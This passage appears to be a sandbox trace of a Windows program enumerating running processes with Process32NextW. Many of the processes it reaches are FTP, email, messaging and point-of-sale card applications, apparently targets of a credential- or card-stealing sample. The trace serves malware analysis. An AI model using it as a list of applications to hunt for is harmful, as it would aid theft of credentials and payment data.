hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending_windsor_bouquet.exe")) returned 1 [0183.809] lstrlenW (lpString="pending_windsor_bouquet.exe") returned 27 [0183.809] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers.exe")) returned 1 [0183.810] lstrlenW (lpString="workers.exe") returned 11 [0183.810] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x520, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="succeed.exe")) returned 1 [0183.811] lstrlenW (lpString="succeed.exe") returned 11 [0183.811] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="washer jar.exe")) returned 1 [0183.811] lstrlenW (lpString="washer jar.exe") returned 14 [0183.811] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights_attending_other.exe")) returned 1 [0183.812] lstrlenW (lpString="nights_attending_other.exe") returned 26 [0183.812] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="useful_courts.exe")) returned 1 [0183.812] lstrlenW (lpString="useful_courts.exe") returned 17 [0183.812] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="compounds spanish.exe")) returned 1 [0183.813] lstrlenW (lpString="compounds spanish.exe") returned 21 [0183.813] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="look-albuquerque-left.exe")) returned 1 [0183.813] lstrlenW (lpString="look-albuquerque-left.exe") returned 25 [0183.813] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="try.exe")) returned 1 [0183.814] lstrlenW (lpString="try.exe") returned 7 [0183.814] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="statuteide.exe")) returned 1 [0183.815] lstrlenW (lpString="statuteide.exe") returned 14 [0183.815] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0183.815] lstrlenW (lpString="invite.exe") returned 10 [0183.816] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="register voluntary fluid.exe")) returned 1 [0183.816] lstrlenW (lpString="register voluntary fluid.exe") returned 28 [0183.816] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="cope finances ringtones.exe")) returned 1 [0183.817] lstrlenW (lpString="cope finances ringtones.exe") returned 27 [0183.817] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="modules_recommend.exe")) returned 1 [0183.817] lstrlenW (lpString="modules_recommend.exe") returned 21 [0183.817] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazinedeletecomparisons.exe")) returned 1 [0183.818] lstrlenW (lpString="magazinedeletecomparisons.exe") returned 29 [0183.818] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.819] lstrlenW (lpString="svchost.exe") returned 11 [0183.819] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0183.819] lstrlenW (lpString="3dftp.exe") returned 9 [0183.819] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0183.820] lstrlenW (lpString="absolutetelnet.exe") returned 18 [0183.820] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0183.821] lstrlenW (lpString="alftp.exe") returned 9 [0183.821] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0183.821] lstrlenW (lpString="barca.exe") returned 9 [0183.821] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0183.822] lstrlenW (lpString="bitkinex.exe") returned 12 [0183.822] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0183.823] lstrlenW (lpString="coreftp.exe") returned 11 [0183.823] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0183.824] lstrlenW (lpString="far.exe") returned 7 [0183.824] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0183.825] lstrlenW (lpString="filezilla.exe") returned 13 [0183.825] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0183.826] lstrlenW (lpString="flashfxp.exe") returned 12 [0183.826] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0183.827] lstrlenW (lpString="fling.exe") returned 9 [0183.827] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0183.828] lstrlenW (lpString="foxmailincmail.exe") returned 18 [0183.828] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0183.830] lstrlenW (lpString="gmailnotifierpro.exe") returned 20 [0183.830] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0183.831] lstrlenW (lpString="icq.exe") returned 7 [0183.831] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0183.832] lstrlenW (lpString="leechftp.exe") returned 12 [0183.832] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0183.833] lstrlenW (lpString="ncftp.exe") returned 9 [0183.833] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0183.834] lstrlenW (lpString="notepad.exe") returned 11 [0183.834] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0183.835] lstrlenW (lpString="operamail.exe") returned 13 [0183.835] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0183.836] lstrlenW (lpString="pidgin.exe") returned 10 [0183.836] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0183.837] lstrlenW (lpString="scriptftp.exe") returned 13 [0183.837] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0183.838] lstrlenW (lpString="skype.exe") returned 9 [0183.838] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0183.839] lstrlenW (lpString="smartftp.exe") returned 12 [0183.839] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0183.840] lstrlenW (lpString="thunderbird.exe") returned 15 [0183.840] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0183.841] lstrlenW (lpString="totalcmd.exe") returned 12 [0183.841] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0183.842] lstrlenW (lpString="trillian.exe") returned 12 [0183.842] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0183.843] lstrlenW (lpString="webdrive.exe") returned 12 [0183.843] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0183.844] lstrlenW (lpString="whatsapp.exe") returned 12 [0183.844] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0183.844] lstrlenW (lpString="winscp.exe") returned 10 [0183.844] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0183.845] lstrlenW (lpString="yahoomessenger.exe") returned 18 [0183.845] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0183.846] lstrlenW (lpString="active-charge.exe") returned 17 [0183.846] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0184.213] lstrlenW (lpString="accupos.exe") returned 11 [0184.213] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0184.214] lstrlenW (lpString="afr38.exe") returned 9 [0184.215] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0184.221] lstrlenW (lpString="aldelo.exe") returned 10 [0184.221] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0184.222] lstrlenW (lpString="ccv_server.exe") returned 14 [0184.222] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0184.223] lstrlenW (lpString="centralcreditcard.exe") returned 21 [0184.223] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0184.224] lstrlenW (lpString="creditservice.exe") returned 17 [0184.225] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0184.226] lstrlenW (lpString="edcsvr.exe") returned 10 [0184.226] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0184.227] lstrlenW (lpString="fpos.exe") returned 8 [0184.227] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0184.228] lstrlenW (lpString="isspos.exe") returned 10 [0184.228] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0184.229] lstrlenW (lpString="mxslipstream.exe") returned 16 [0184.229] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1010, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0184.230] lstrlenW (lpString="omnipos.exe") returned 11 [0184.230] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0184.231] lstrlenW (lpString="spcwin.exe") returned 10 [0184.232] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0184.233] lstrlenW (lpString="spgagentservice.exe") returned 19 [0184.233] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0184.234] lstrlenW (lpString="utg2.exe") returned 8 [0184.234] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1060, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_community.exe")) returned 1 [0184.235] lstrlenW (lpString="lb_community.exe") returned 16 [0184.235] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="miniature.exe")) returned 1 [0184.236] lstrlenW (lpString="miniature.exe") returned 13 [0184.236] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="humanity-volumes-enables.exe")) returned 1 [0184.236] lstrlenW (lpString="humanity-volumes-enables.exe") returned 28 [0184.237] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operation-environments.exe")) returned 1 [0184.237] lstrlenW (lpString="operation-environments.exe") returned 26 [0184.238] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0184.238] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0184.239] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0184.239] lstrlenW (lpString="taskhostw.exe") returned 13 [0184.240] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0184.241] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0184.241] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0184.242] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0184.242] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x12b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0184.243] lstrlenW (lpString="conhost.exe") returned 11 [0184.243] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0184.244] lstrlenW (lpString="sppsvc.exe") returned 10 [0184.244] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0184.245] lstrlenW (lpString="dllhost.exe") returned 11 [0184.245] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0184.246] lstrlenW (lpString="wdgmug.exe") returned 10 [0184.246] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1160, th32DefaultHeapID=0x0, 